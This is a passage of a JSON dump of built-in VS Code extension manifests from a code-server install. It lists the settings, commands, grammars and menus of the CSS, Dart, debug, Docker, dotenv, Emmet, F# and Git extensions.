preserved."},"less.format.maxPreserveNewLines":{"type":["number","null"],"scope":"resource","default":null,"markdownDescription":"Maximum number of line breaks to be preserved in one chunk, when `#less.format.preserveNewLines#` is enabled."}}}],"configurationDefaults":{"[css]":{"editor.suggest.insertMode":"replace"},"[scss]":{"editor.suggest.insertMode":"replace"},"[less]":{"editor.suggest.insertMode":"replace"}},"jsonValidation":[{"fileMatch":"*.css-data.json","url":"https://raw.githubusercontent.com/microsoft/vscode-css-languageservice/master/docs/customData.schema.json"},{"fileMatch":"package.json","url":"./schemas/package.schema.json"}]},"repository":{"type":"git","url":"https://github.com/microsoft/vscode.git"}},"location":{"$mid":1,"path":"/usr/lib/code-server/lib/vscode/extensions/css-language-features","scheme":"file"},"isBuiltin":true,"targetPlatform":"undefined","isValid":true,"validations":[],"preRelease":false},{"type":0,"identifier":{"id":"vscode.dart"},"manifest":{"name":"dart","displayName":"Dart Language Basics","description":"Provides syntax highlighting & bracket matching in Dart files.","version":"1.0.0","publisher":"vscode","license":"MIT","engines":{"vscode":"0.10.x"},"scripts":{"update-grammar":"node ../node_modules/vscode-grammar-updater/bin dart-lang/dart-syntax-highlight grammars/dart.json ./syntaxes/dart.tmLanguage.json"},"categories":["Programming Languages"],"contributes":{"languages":[{"id":"dart","extensions":[".dart"],"aliases":["Dart"],"configuration":"./language-configuration.json"}],"grammars":[{"language":"dart","scopeName":"source.dart","path":"./syntaxes/dart.tmLanguage.json"}]}},"location":{"$mid":1,"path":"/usr/lib/code-server/lib/vscode/extensions/dart","scheme":"file"},"isBuiltin":true,"targetPlatform":"undefined","isValid":true,"validations":[],"preRelease":false},{"type":0,"identifier":{"id":"vscode.debug-auto-launch"},"manifest":{"name":"debug-auto-launch","displayName":"Node Debug Auto-attach","description":"Helper for auto-attach feature when node-debug extensions are not active.","version":"1.0.0","publisher":"vscode","license":"MIT","engines":{"vscode":"^1.5.0"},"icon":"media/icon.png","capabilities":{"virtualWorkspaces":false,"untrustedWorkspaces":{"supported":true}},"activationEvents":["onStartupFinished"],"main":"./dist/extension","contributes":{"commands":[{"command":"extension.node-debug.toggleAutoAttach","title":"Toggle Auto Attach","category":"Debug"}]},"prettier":{"printWidth":100,"trailingComma":"all","singleQuote":true,"arrowParens":"avoid"},"repository":{"type":"git","url":"https://github.com/microsoft/vscode.git"}},"location":{"$mid":1,"path":"/usr/lib/code-server/lib/vscode/extensions/debug-auto-launch","scheme":"file"},"isBuiltin":true,"targetPlatform":"undefined","isValid":true,"validations":[],"preRelease":false},{"type":0,"identifier":{"id":"vscode.debug-server-ready"},"manifest":{"name":"debug-server-ready","displayName":"Server Ready Action","description":"Open URI in browser if server under debugging is ready.","version":"1.0.0","publisher":"vscode","license":"MIT","engines":{"vscode":"^1.32.0"},"icon":"media/icon.png","activationEvents":["onDebugResolve"],"capabilities":{"virtualWorkspaces":false,"untrustedWorkspaces":{"supported":true}},"enabledApiProposals":["terminalDataWriteEvent"],"main":"./dist/extension","contributes":{"debuggers":[{"type":"*","configurationAttributes":{"launch":{"properties":{"serverReadyAction":{"oneOf":[{"type":"object","additionalProperties":false,"markdownDescription":"Act upon a URI when a server program under debugging is ready (indicated by sending output of the form 'listening on port 3000' or 'Now listening on: https://localhost:5001' to the debug console.)","default":{"action":"openExternally","killOnServerStop":false},"properties":{"action":{"type":"string","enum":["openExternally"],"enumDescriptions":["Open URI externally with the default application."],"markdownDescription":"What to do with the URI when the server is ready.","default":"openExternally"},"pattern":{"type":"string","markdownDescription":"Server is ready if this pattern appears on the debug console. The first capture group must include a URI or a port number.","default":"listening on port ([0-9]+)"},"uriFormat":{"type":"string","markdownDescription":"A format string used when constructing the URI from a port number. The first '%s' is substituted with the port number.","default":"http://localhost:%s"},"killOnServerStop":{"type":"boolean","markdownDescription":"Stop the child session when the parent session stopped.","default":false}}},{"type":"object","additionalProperties":false,"markdownDescription":"Act upon a URI when a server program under debugging is ready (indicated by sending output of the form 'listening on port 3000' or 'Now listening on: https://localhost:5001' to the debug console.)","default":{"action":"debugWithEdge","pattern":"listening on port ([0-9]+)","uriFormat":"http://localhost:%s","webRoot":"${workspaceFolder}","killOnServerStop":false},"properties":{"action":{"type":"string","enum":["debugWithChrome","debugWithEdge"],"enumDescriptions":["Start debugging with the 'Debugger for Chrome'."],"markdownDescription":"What to do with the URI when the server is ready.","default":"debugWithEdge"},"pattern":{"type":"string","markdownDescription":"Server is ready if this pattern appears on the debug console. The first capture group must include a URI or a port number.","default":"listening on port ([0-9]+)"},"uriFormat":{"type":"string","markdownDescription":"A format string used when constructing the URI from a port number. The first '%s' is substituted with the port number.","default":"http://localhost:%s"},"webRoot":{"type":"string","markdownDescription":"Value passed to the debug configuration for the 'Debugger for Chrome'.","default":"${workspaceFolder}"},"killOnServerStop":{"type":"boolean","markdownDescription":"Stop the child session when the parent session stopped.","default":false}}},{"type":"object","additionalProperties":false,"markdownDescription":"Act upon a URI when a server program under debugging is ready (indicated by sending output of the form 'listening on port 3000' or 'Now listening on: https://localhost:5001' to the debug console.)","default":{"action":"startDebugging","name":"","killOnServerStop":false},"required":["name"],"properties":{"action":{"type":"string","enum":["startDebugging"],"enumDescriptions":["Run another launch configuration."],"markdownDescription":"What to do with the URI when the server is ready.","default":"startDebugging"},"pattern":{"type":"string","markdownDescription":"Server is ready if this pattern appears on the debug console. The first capture group must include a URI or a port number.","default":"listening on port ([0-9]+)"},"name":{"type":"string","markdownDescription":"Name of the launch configuration to run.","default":"Launch Browser"},"killOnServerStop":{"type":"boolean","markdownDescription":"Stop the child session when the parent session stopped.","default":false}}},{"type":"object","additionalProperties":false,"markdownDescription":"Act upon a URI when a server program under debugging is ready (indicated by sending output of the form 'listening on port 3000' or 'Now listening on: https://localhost:5001' to the debug console.)","default":{"action":"startDebugging","config":{"type":"node","request":"launch"},"killOnServerStop":false},"required":["config"],"properties":{"action":{"type":"string","enum":["startDebugging"],"enumDescriptions":["Run another launch configuration."],"markdownDescription":"What to do with the URI when the server is ready.","default":"startDebugging"},"pattern":{"type":"string","markdownDescription":"Server is ready if this pattern appears on the debug console. The first capture group must include a URI or a port number.","default":"listening on port ([0-9]+)"},"config":{"type":"object","markdownDescription":"The debug configuration to run.","default":{}},"killOnServerStop":{"type":"boolean","markdownDescription":"Stop the child session when the parent session stopped.","default":false}}}]}}}}}]},"repository":{"type":"git","url":"https://github.com/microsoft/vscode.git"}},"location":{"$mid":1,"path":"/usr/lib/code-server/lib/vscode/extensions/debug-server-ready","scheme":"file"},"isBuiltin":true,"targetPlatform":"undefined","isValid":true,"validations":[],"preRelease":false},{"type":0,"identifier":{"id":"vscode.diff"},"manifest":{"name":"diff","displayName":"Diff Language Basics","description":"Provides syntax highlighting & bracket matching in Diff files.","version":"1.0.0","publisher":"vscode","license":"MIT","engines":{"vscode":"0.10.x"},"scripts":{"update-grammar":"node ../node_modules/vscode-grammar-updater/bin textmate/diff.tmbundle Syntaxes/Diff.plist ./syntaxes/diff.tmLanguage.json"},"categories":["Programming Languages"],"contributes":{"languages":[{"id":"diff","aliases":["Diff","diff"],"extensions":[".diff",".patch",".rej"],"configuration":"./language-configuration.json"}],"grammars":[{"language":"diff","scopeName":"source.diff","path":"./syntaxes/diff.tmLanguage.json"}]}},"location":{"$mid":1,"path":"/usr/lib/code-server/lib/vscode/extensions/diff","scheme":"file"},"isBuiltin":true,"targetPlatform":"undefined","isValid":true,"validations":[],"preRelease":false},{"type":0,"identifier":{"id":"vscode.docker"},"manifest":{"name":"docker","displayName":"Docker Language Basics","description":"Provides syntax highlighting and bracket matching in Docker files.","version":"1.0.0","publisher":"vscode","license":"MIT","engines":{"vscode":"*"},"scripts":{},"categories":["Programming Languages"],"contributes":{"languages":[{"id":"dockerfile","extensions":[".dockerfile",".containerfile"],"filenames":["Dockerfile","Containerfile"],"filenamePatterns":["Dockerfile.*","Containerfile.*"],"aliases":["Docker","Dockerfile","Containerfile"],"configuration":"./language-configuration.json"}],"grammars":[{"language":"dockerfile","scopeName":"source.dockerfile","path":"./syntaxes/docker.tmLanguage.json"}],"configurationDefaults":{"[dockerfile]":{"editor.quickSuggestions":{"strings":true}}}},"repository":{"type":"git","url":"https://github.com/microsoft/vscode.git"}},"location":{"$mid":1,"path":"/usr/lib/code-server/lib/vscode/extensions/docker","scheme":"file"},"isBuiltin":true,"targetPlatform":"undefined","isValid":true,"validations":[],"preRelease":false},{"type":0,"identifier":{"id":"vscode.dotenv"},"manifest":{"name":"dotenv","displayName":"Dotenv Language Basics","description":"Provides syntax highlighting and bracket matching in dotenv files.","version":"1.0.0","publisher":"vscode","license":"MIT","engines":{"vscode":"*"},"scripts":{"update-grammar":"node ../node_modules/vscode-grammar-updater/bin dotenv-org/dotenv-vscode syntaxes/dotenv.tmLanguage.json ./syntaxes/dotenv.tmLanguage.json"},"categories":["Programming Languages"],"contributes":{"languages":[{"id":"dotenv","extensions":[".env"],"filenames":[".env",".flaskenv","user-dirs.dirs"],"filenamePatterns":[".env.*"],"aliases":["Dotenv"],"configuration":"./language-configuration.json"}],"grammars":[{"language":"dotenv","scopeName":"source.dotenv","path":"./syntaxes/dotenv.tmLanguage.json"}]},"repository":{"type":"git","url":"https://github.com/microsoft/vscode.git"}},"location":{"$mid":1,"path":"/usr/lib/code-server/lib/vscode/extensions/dotenv","scheme":"file"},"isBuiltin":true,"targetPlatform":"undefined","isValid":true,"validations":[],"preRelease":false},{"type":0,"identifier":{"id":"vscode.emmet"},"manifest":{"name":"emmet","displayName":"Emmet","description":"Emmet support for VS Code","version":"1.0.0","publisher":"vscode","license":"MIT","engines":{"vscode":"^1.13.0"},"icon":"images/icon.png","categories":["Other"],"repository":{"type":"git","url":"https://github.com/microsoft/vscode.git"},"activationEvents":["onCommand:emmet.expandAbbreviation","onLanguage"],"main":"./dist/node/emmetNodeMain","browser":"./dist/browser/emmetBrowserMain","contributes":{"configuration":{"type":"object","title":"Emmet","properties":{"emmet.showExpandedAbbreviation":{"type":["string"],"enum":["never","always","inMarkupAndStylesheetFilesOnly"],"default":"always","markdownDescription":"Shows expanded Emmet abbreviations as suggestions.\nThe option `\"inMarkupAndStylesheetFilesOnly\"` applies to html, haml, jade, slim, xml, xsl, css, scss, sass, less and stylus.\nThe option `\"always\"` applies to all parts of the file regardless of markup/css."},"emmet.showAbbreviationSuggestions":{"type":"boolean","default":true,"scope":"language-overridable","markdownDescription":"Shows possible Emmet abbreviations as suggestions. Not applicable in stylesheets or when emmet.showExpandedAbbreviation is set to `\"never\"`."},"emmet.includeLanguages":{"type":"object","additionalProperties":{"type":"string"},"default":{},"markdownDescription":"Enable Emmet abbreviations in languages that are not supported by default. Add a mapping here between the language and Emmet supported language.\n For example: `{\"vue-html\": \"html\", \"javascript\": \"javascriptreact\"}`"},"emmet.variables":{"type":"object","properties":{"lang":{"type":"string","default":"en"},"charset":{"type":"string","default":"UTF-8"}},"additionalProperties":{"type":"string"},"default":{},"markdownDescription":"Variables to be used in Emmet snippets."},"emmet.syntaxProfiles":{"type":"object","default":{},"markdownDescription":"Define profile for specified syntax or use your own profile with specific rules."},"emmet.excludeLanguages":{"type":"array","items":{"type":"string"},"default":["markdown"],"markdownDescription":"An array of languages where Emmet abbreviations should not be expanded."},"emmet.extensionsPath":{"type":"array","items":{"type":"string","markdownDescription":"A path containing Emmet syntaxProfiles and/or snippets."},"default":[],"scope":"machine-overridable","markdownDescription":"An array of paths, where each path can contain Emmet syntaxProfiles and/or snippet files.\nIn case of conflicts, the profiles/snippets of later paths will override those of earlier paths.\nSee https://code.visualstudio.com/docs/editor/emmet for more information and an example snippet file."},"emmet.triggerExpansionOnTab":{"type":"boolean","default":false,"scope":"language-overridable","markdownDescription":"When enabled, Emmet abbreviations are expanded when pressing TAB, even when completions do not show up. When disabled, completions that show up can still be accepted by pressing TAB."},"emmet.useInlineCompletions":{"type":"boolean","default":false,"markdownDescription":"If `true`, Emmet will use inline completions to suggest expansions. To prevent the non-inline completion item provider from showing up as often while this setting is `true`, turn `#editor.quickSuggestions#` to `inline` or `off` for the `other` item."},"emmet.preferences":{"type":"object","default":{},"markdownDescription":"Preferences used to modify behavior of some actions and resolvers of Emmet.","properties":{"css.intUnit":{"type":"string","default":"px","markdownDescription":"Default unit for integer values."},"css.floatUnit":{"type":"string","default":"em","markdownDescription":"Default unit for float values."},"css.propertyEnd":{"type":"string","default":";","markdownDescription":"Symbol to be placed at the end of CSS property when expanding CSS abbreviations."},"sass.propertyEnd":{"type":"string","default":"","markdownDescription":"Symbol to be placed at the end of CSS property when expanding CSS abbreviations in Sass files."},"stylus.propertyEnd":{"type":"string","default":"","markdownDescription":"Symbol to be placed at the end of CSS property when expanding CSS abbreviations in Stylus files."},"css.valueSeparator":{"type":"string","default":": ","markdownDescription":"Symbol to be placed at the between CSS property and value when expanding CSS abbreviations."},"sass.valueSeparator":{"type":"string","default":": ","markdownDescription":"Symbol to be placed at the between CSS property and value when expanding CSS abbreviations in Sass files."},"stylus.valueSeparator":{"type":"string","default":" ","markdownDescription":"Symbol to be placed at the between CSS property and value when expanding CSS abbreviations in Stylus files."},"bem.elementSeparator":{"type":"string","default":"__","markdownDescription":"Element separator used for classes when using the BEM filter."},"bem.modifierSeparator":{"type":"string","default":"_","markdownDescription":"Modifier separator used for classes when using the BEM filter."},"filter.commentBefore":{"type":"string","default":"","markdownDescription":"A definition of comment that should be placed before matched element when comment filter is applied."},"filter.commentAfter":{"type":"string","default":"\n","markdownDescription":"A definition of comment that should be placed after matched element when comment filter is applied."},"filter.commentTrigger":{"type":"array","default":["id","class"],"markdownDescription":"A comma-separated list of attribute names that should exist in the abbreviation for the comment filter to be applied."},"format.noIndentTags":{"type":"array","default":["html"],"markdownDescription":"An array of tag names that should never get inner indentation."},"format.forceIndentationForTags":{"type":"array","default":["body"],"markdownDescription":"An array of tag names that should always get inner indentation."},"profile.allowCompactBoolean":{"type":"boolean","default":false,"markdownDescription":"If `true`, compact notation of boolean attributes are produced."},"css.webkitProperties":{"type":"string","default":null,"markdownDescription":"Comma separated CSS properties that get the 'webkit' vendor prefix when used in Emmet abbreviation that starts with `-`. Set to empty string to always avoid the 'webkit' prefix."},"css.mozProperties":{"type":"string","default":null,"markdownDescription":"Comma separated CSS properties that get the 'moz' vendor prefix when used in Emmet abbreviation that starts with `-`. Set to empty string to always avoid the 'moz' prefix."},"css.oProperties":{"type":"string","default":null,"markdownDescription":"Comma separated CSS properties that get the 'o' vendor prefix when used in Emmet abbreviation that starts with `-`. Set to empty string to always avoid the 'o' prefix."},"css.msProperties":{"type":"string","default":null,"markdownDescription":"Comma separated CSS properties that get the 'ms' vendor prefix when used in Emmet abbreviation that starts with `-`. Set to empty string to always avoid the 'ms' prefix."},"css.fuzzySearchMinScore":{"type":"number","default":0.3,"markdownDescription":"The minimum score (from 0 to 1) that fuzzy-matched abbreviation should achieve. Lower values may produce many false-positive matches, higher values may reduce possible matches."},"output.inlineBreak":{"type":"number","default":0,"markdownDescription":"The number of sibling inline elements needed for line breaks to be placed between those elements. If `0`, inline elements are always expanded onto a single line."},"output.reverseAttributes":{"type":"boolean","default":false,"markdownDescription":"If `true`, reverses attribute merging directions when resolving snippets."},"output.selfClosingStyle":{"type":"string","enum":["html","xhtml","xml"],"default":"html","markdownDescription":"Style of self-closing tags: html (`
`), xml (`
`) or xhtml (`
`)."},"css.color.short":{"type":"boolean","default":true,"markdownDescription":"If `true`, color values like `#f` will be expanded to `#fff` instead of `#ffffff`."}}},"emmet.showSuggestionsAsSnippets":{"type":"boolean","default":false,"markdownDescription":"If `true`, then Emmet suggestions will show up as snippets allowing you to order them as per `#editor.snippetSuggestions#` setting."},"emmet.optimizeStylesheetParsing":{"type":"boolean","default":true,"markdownDescription":"When set to `false`, the whole file is parsed to determine if current position is valid for expanding Emmet abbreviations. When set to `true`, only the content around the current position in CSS/SCSS/Less files is parsed."}}},"commands":[{"command":"editor.emmet.action.wrapWithAbbreviation","title":"Wrap with Abbreviation","category":"Emmet"},{"command":"editor.emmet.action.removeTag","title":"Remove Tag","category":"Emmet"},{"command":"editor.emmet.action.updateTag","title":"Update Tag","category":"Emmet"},{"command":"editor.emmet.action.matchTag","title":"Go to Matching Pair","category":"Emmet"},{"command":"editor.emmet.action.balanceIn","title":"Balance (inward)","category":"Emmet"},{"command":"editor.emmet.action.balanceOut","title":"Balance (outward)","category":"Emmet"},{"command":"editor.emmet.action.prevEditPoint","title":"Go to Previous Edit Point","category":"Emmet"},{"command":"editor.emmet.action.nextEditPoint","title":"Go to Next Edit Point","category":"Emmet"},{"command":"editor.emmet.action.mergeLines","title":"Merge Lines","category":"Emmet"},{"command":"editor.emmet.action.selectPrevItem","title":"Select Previous Item","category":"Emmet"},{"command":"editor.emmet.action.selectNextItem","title":"Select Next Item","category":"Emmet"},{"command":"editor.emmet.action.splitJoinTag","title":"Split/Join Tag","category":"Emmet"},{"command":"editor.emmet.action.toggleComment","title":"Toggle Comment","category":"Emmet"},{"command":"editor.emmet.action.evaluateMathExpression","title":"Evaluate Math Expression","category":"Emmet"},{"command":"editor.emmet.action.updateImageSize","title":"Update Image Size","category":"Emmet"},{"command":"editor.emmet.action.incrementNumberByOneTenth","title":"Increment by 0.1","category":"Emmet"},{"command":"editor.emmet.action.incrementNumberByOne","title":"Increment by 1","category":"Emmet"},{"command":"editor.emmet.action.incrementNumberByTen","title":"Increment by 10","category":"Emmet"},{"command":"editor.emmet.action.decrementNumberByOneTenth","title":"Decrement by 0.1","category":"Emmet"},{"command":"editor.emmet.action.decrementNumberByOne","title":"Decrement by 1","category":"Emmet"},{"command":"editor.emmet.action.decrementNumberByTen","title":"Decrement by 10","category":"Emmet"},{"command":"editor.emmet.action.reflectCSSValue","title":"Reflect CSS Value","category":"Emmet"},{"command":"workbench.action.showEmmetCommands","title":"Show Emmet Commands","category":""}],"menus":{"commandPalette":[{"command":"editor.emmet.action.wrapWithAbbreviation","when":"!activeEditorIsReadonly"},{"command":"editor.emmet.action.removeTag","when":"!activeEditorIsReadonly"},{"command":"editor.emmet.action.updateTag","when":"!activeEditorIsReadonly"},{"command":"editor.emmet.action.matchTag","when":"!activeEditorIsReadonly"},{"command":"editor.emmet.action.balanceIn","when":"!activeEditorIsReadonly"},{"command":"editor.emmet.action.balanceOut","when":"!activeEditorIsReadonly"},{"command":"editor.emmet.action.prevEditPoint","when":"!activeEditorIsReadonly"},{"command":"editor.emmet.action.nextEditPoint","when":"!activeEditorIsReadonly"},{"command":"editor.emmet.action.mergeLines","when":"!activeEditorIsReadonly"},{"command":"editor.emmet.action.selectPrevItem","when":"!activeEditorIsReadonly"},{"command":"editor.emmet.action.selectNextItem","when":"!activeEditorIsReadonly"},{"command":"editor.emmet.action.splitJoinTag","when":"!activeEditorIsReadonly"},{"command":"editor.emmet.action.toggleComment","when":"!activeEditorIsReadonly"},{"command":"editor.emmet.action.evaluateMathExpression","when":"!activeEditorIsReadonly"},{"command":"editor.emmet.action.updateImageSize","when":"!activeEditorIsReadonly"},{"command":"editor.emmet.action.incrementNumberByOneTenth","when":"!activeEditorIsReadonly"},{"command":"editor.emmet.action.incrementNumberByOne","when":"!activeEditorIsReadonly"},{"command":"editor.emmet.action.incrementNumberByTen","when":"!activeEditorIsReadonly"},{"command":"editor.emmet.action.decrementNumberByOneTenth","when":"!activeEditorIsReadonly"},{"command":"editor.emmet.action.decrementNumberByOne","when":"!activeEditorIsReadonly"},{"command":"editor.emmet.action.decrementNumberByTen","when":"!activeEditorIsReadonly"},{"command":"editor.emmet.action.reflectCSSValue","when":"!activeEditorIsReadonly"}]}},"capabilities":{"virtualWorkspaces":true,"untrustedWorkspaces":{"supported":true}}},"location":{"$mid":1,"path":"/usr/lib/code-server/lib/vscode/extensions/emmet","scheme":"file"},"isBuiltin":true,"targetPlatform":"undefined","isValid":true,"validations":[],"preRelease":false},{"type":0,"identifier":{"id":"vscode.extension-editing"},"manifest":{"name":"extension-editing","displayName":"Extension Authoring","description":"Provides linting capabilities for authoring extensions.","version":"1.0.0","publisher":"vscode","license":"MIT","engines":{"vscode":"^1.4.0"},"icon":"images/icon.png","activationEvents":["onLanguage:json","onLanguage:markdown"],"main":"./dist/extensionEditingMain","browser":"./dist/browser/extensionEditingBrowserMain","capabilities":{"virtualWorkspaces":true,"untrustedWorkspaces":{"supported":true}},"contributes":{"jsonValidation":[{"fileMatch":"package.json","url":"vscode://schemas/vscode-extensions"},{"fileMatch":"*language-configuration.json","url":"vscode://schemas/language-configuration"},{"fileMatch":["*icon-theme.json","!*product-icon-theme.json"],"url":"vscode://schemas/icon-theme"},{"fileMatch":"*product-icon-theme.json","url":"vscode://schemas/product-icon-theme"},{"fileMatch":"*color-theme.json","url":"vscode://schemas/color-theme"}],"languages":[{"id":"ignore","filenames":[".vscodeignore"]}]},"repository":{"type":"git","url":"https://github.com/microsoft/vscode.git"}},"location":{"$mid":1,"path":"/usr/lib/code-server/lib/vscode/extensions/extension-editing","scheme":"file"},"isBuiltin":true,"targetPlatform":"undefined","isValid":true,"validations":[],"preRelease":false},{"type":0,"identifier":{"id":"vscode.fsharp"},"manifest":{"name":"fsharp","displayName":"F# Language Basics","description":"Provides snippets, syntax highlighting, bracket matching and folding in F# files.","version":"1.0.0","publisher":"vscode","license":"MIT","engines":{"vscode":"*"},"scripts":{"update-grammar":"node ../node_modules/vscode-grammar-updater/bin ionide/ionide-fsgrammar grammars/fsharp.json ./syntaxes/fsharp.tmLanguage.json"},"categories":["Programming Languages"],"contributes":{"languages":[{"id":"fsharp","extensions":[".fs",".fsi",".fsx",".fsscript"],"aliases":["F#","FSharp","fsharp"],"configuration":"./language-configuration.json"}],"grammars":[{"language":"fsharp","scopeName":"source.fsharp","path":"./syntaxes/fsharp.tmLanguage.json"}],"snippets":[{"language":"fsharp","path":"./snippets/fsharp.code-snippets"}],"configurationDefaults":{"[fsharp]":{"diffEditor.ignoreTrimWhitespace":false}}},"repository":{"type":"git","url":"https://github.com/microsoft/vscode.git"}},"location":{"$mid":1,"path":"/usr/lib/code-server/lib/vscode/extensions/fsharp","scheme":"file"},"isBuiltin":true,"targetPlatform":"undefined","isValid":true,"validations":[],"preRelease":false},{"type":0,"identifier":{"id":"vscode.git"},"manifest":{"name":"git","displayName":"Git","description":"Git SCM Integration","publisher":"vscode","license":"MIT","version":"1.0.0","engines":{"vscode":"^1.5.0"},"aiKey":"0c6ae279ed8443289764825290e4f9e2-1a736e7c-1324-4338-be46-fc2a58ae4d14-7255","enabledApiProposals":["canonicalUriProvider","contribEditSessions","contribEditorContentMenu","contribMergeEditorMenus","contribMultiDiffEditorMenus","contribDiffEditorGutterToolBarMenus","contribSourceControlArtifactGroupMenu","contribSourceControlArtifactMenu","contribSourceControlHistoryItemMenu","contribSourceControlHistoryTitleMenu","contribSourceControlInputBoxMenu","contribSourceControlTitleMenu","contribViewsWelcome","editSessionIdentityProvider","quickDiffProvider","quickInputButtonLocation","quickPickSortByLabel","scmActionButton","scmArtifactProvider","scmHistoryProvider","scmMultiDiffEditor","scmProviderOptions","scmSelectedProvider","scmTextDocument","scmValidation","statusBarItemTooltip","tabInputMultiDiff","tabInputTextMerge","textEditorDiffInformation","timeline"],"categories":["Other"],"activationEvents":["*","onEditSession:file","onFileSystem:git","onFileSystem:git-show"],"extensionDependencies":["vscode.git-base"],"main":"./dist/main","icon":"resources/icons/git.png","capabilities":{"virtualWorkspaces":true,"untrustedWorkspaces":{"supported":false}},"contributes":{"commands":[{"command":"git.continueInLocalClone","title":"Clone Repository Locally and Open on Desktop...","category":"Git","icon":"$(repo-clone)","enablement":"config.git.enabled && !git.missing && gitOpenRepositoryCount != 0 && remoteName"},{"command":"git.clone","title":"Clone","category":"Git","enablement":"!operationInProgress"},{"command":"git.cloneRecursive","title":"Clone (Recursive)","category":"Git","enablement":"!operationInProgress"},{"command":"git.init","title":"Initialize Repository","category":"Git","icon":"$(add)","enablement":"!operationInProgress"},{"command":"git.openRepository","title":"Open Repository","category":"Git","enablement":"!operationInProgress"},{"command":"git.reopenClosedRepositories","title":"Reopen Closed Repositories...","icon":"$(repo)","category":"Git","enablement":"!operationInProgress && git.closedRepositoryCount != 0"},{"command":"git.close","title":"Close Repository","category":"Git","enablement":"!operationInProgress"},{"command":"git.closeOtherRepositories","title":"Close Other Repositories","category":"Git","enablement":"!operationInProgress"},{"command":"git.openWorktree","title":"Open Worktree in Current Window","category":"Git","enablement":"!operationInProgress"},{"command":"git.openWorktreeInNewWindow","title":"Open Worktree in New Window","category":"Git","enablement":"!operationInProgress"},{"command":"git.refresh","title":"Refresh","category":"Git","icon":"$(refresh)","enablement":"!operationInProgress"},{"command":"git.compareWithWorkspace","title":"Compare with Workspace","category":"Git"},{"command":"git.openChange","title":"Open Changes","category":"Git","icon":"$(compare-changes)"},{"command":"git.openAllChanges","title":"Open All Changes","category":"Git"},{"command":"git.openFile","title":"Open File","category":"Git","icon":"$(go-to-file)"},{"command":"git.openFile2","title":"Open File","category":"Git","icon":"$(go-to-file)"},{"command":"git.openHEADFile","title":"Open File (HEAD)","category":"Git"},{"command":"git.stage","title":"Stage Changes","category":"Git","icon":"$(add)","enablement":"!operationInProgress"},{"command":"git.stageAll","title":"Stage All Changes","category":"Git","icon":"$(add)","enablement":"!operationInProgress"},{"command":"git.stageAllTracked","title":"Stage All Tracked Changes","category":"Git","icon":"$(add)","enablement":"!operationInProgress"},{"command":"git.stageAllUntracked","title":"Stage All Untracked Changes","category":"Git","icon":"$(add)","enablement":"!operationInProgress"},{"command":"git.stageAllMerge","title":"Stage All Merge Changes","category":"Git","icon":"$(add)","enablement":"!operationInProgress"},{"command":"git.stageSelectedRanges","title":"Stage Selected Ranges","category":"Git","enablement":"!operationInProgress"},{"command":"git.diff.stageHunk","title":"Stage Block","category":"Git","icon":"$(plus)"},{"command":"git.diff.stageSelection","title":"Stage Selection","category":"Git","icon":"$(plus)"},{"command":"git.revertSelectedRanges","title":"Revert Selected Ranges","category":"Git","enablement":"!operationInProgress"},{"command":"git.stageChange","title":"Stage Change","category":"Git","icon":"$(add)","enablement":"!operationInProgress"},{"command":"git.stageFile","title":"Stage Changes","category":"Git","icon":"$(add)","enablement":"!operationInProgress"},{"command":"git.revertChange","title":"Revert Change","category":"Git","icon":"$(discard)","enablement":"!operationInProgress"},{"command":"git.unstage","title":"Unstage Changes","category":"Git","icon":"$(remove)","enablement":"!operationInProgress"},{"command":"git.unstageAll","title":"Unstage All Changes","category":"Git","icon":"$(remove)","enablement":"!operationInProgress"},{"command":"git.unstageSelectedRanges","title":"Unstage Selected Ranges","category":"Git","enablement":"!operationInProgress"},{"command":"git.unstageChange","title":"Unstage Change","category":"Git","icon":"$(remove)","enablement":"!operationInProgress"},{"command":"git.unstageFile","title":"Unstage Changes","category":"Git","icon":"$(remove)","enablement":"!operationInProgress"},{"command":"git.clean","title":"Discard Changes","category":"Git","icon":"$(discard)","enablement":"!operationInProgress"},{"command":"git.cleanAll","title":"Discard All Changes","category":"Git","icon":"$(discard)","enablement":"!operationInProgress"},{"command":"git.cleanAllTracked","title":"Discard All Tracked Changes","category":"Git","icon":"$(discard)","enablement":"!operationInProgress"},{"command":"git.cleanAllUntracked","title":"Discard All Untracked Changes","category":"Git","icon":"$(discard)","enablement":"!operationInProgress"},{"command":"git.rename","title":"Rename","category":"Git","icon":"$(discard)","enablement":"!operationInProgress"},{"command":"git.commit","title":"Commit","category":"Git","icon":"$(check)","enablement":"!operationInProgress"},{"command":"git.commitAmend","title":"Commit (Amend)","category":"Git","icon":"$(check)","enablement":"!operationInProgress"},{"command":"git.commitSigned","title":"Commit (Signed Off)","category":"Git","icon":"$(check)","enablement":"!operationInProgress"},{"command":"git.commitStaged","title":"Commit Staged","category":"Git","enablement":"!operationInProgress"},{"command":"git.commitEmpty","title":"Commit Empty","category":"Git","enablement":"!operationInProgress"},{"command":"git.commitStagedSigned","title":"Commit Staged (Signed Off)","category":"Git","enablement":"!operationInProgress"},{"command":"git.commitStagedAmend","title":"Commit Staged (Amend)","category":"Git","enablement":"!operationInProgress"},{"command":"git.commitAll","title":"Commit All","category":"Git","enablement":"!operationInProgress"},{"command":"git.commitAllSigned","title":"Commit All (Signed Off)","category":"Git","enablement":"!operationInProgress"},{"command":"git.commitAllAmend","title":"Commit All (Amend)","category":"Git","enablement":"!operationInProgress"},{"command":"git.commitNoVerify","title":"Commit (No Verify)","category":"Git","icon":"$(check)","enablement":"!operationInProgress"},{"command":"git.commitStagedNoVerify","title":"Commit Staged (No Verify)","category":"Git","enablement":"!operationInProgress"},{"command":"git.commitEmptyNoVerify","title":"Commit Empty (No Verify)","category":"Git","enablement":"!operationInProgress"},{"command":"git.commitStagedSignedNoVerify","title":"Commit Staged (Signed Off, No Verify)","category":"Git","enablement":"!operationInProgress"},{"command":"git.commitAmendNoVerify","title":"Commit (Amend, No Verify)","category":"Git","enablement":"!operationInProgress"},{"command":"git.commitSignedNoVerify","title":"Commit (Signed Off, No Verify)","category":"Git","enablement":"!operationInProgress"},{"command":"git.commitStagedAmendNoVerify","title":"Commit Staged (Amend, No Verify)","category":"Git","enablement":"!operationInProgress"},{"command":"git.commitAllNoVerify","title":"Commit All (No Verify)","category":"Git","enablement":"!operationInProgress"},{"command":"git.commitAllSignedNoVerify","title":"Commit All (Signed Off, No Verify)","category":"Git","enablement":"!operationInProgress"},{"command":"git.commitAllAmendNoVerify","title":"Commit All (Amend, No Verify)","category":"Git","enablement":"!operationInProgress"},{"command":"git.commitMessageAccept","title":"Commit","category":"Git"},{"command":"git.commitMessageDiscard","title":"Cancel","icon":"$(close)","category":"Git"},{"command":"git.restoreCommitTemplate","title":"Restore Commit Template","category":"Git","enablement":"!operationInProgress"},{"command":"git.undoCommit","title":"Undo Last 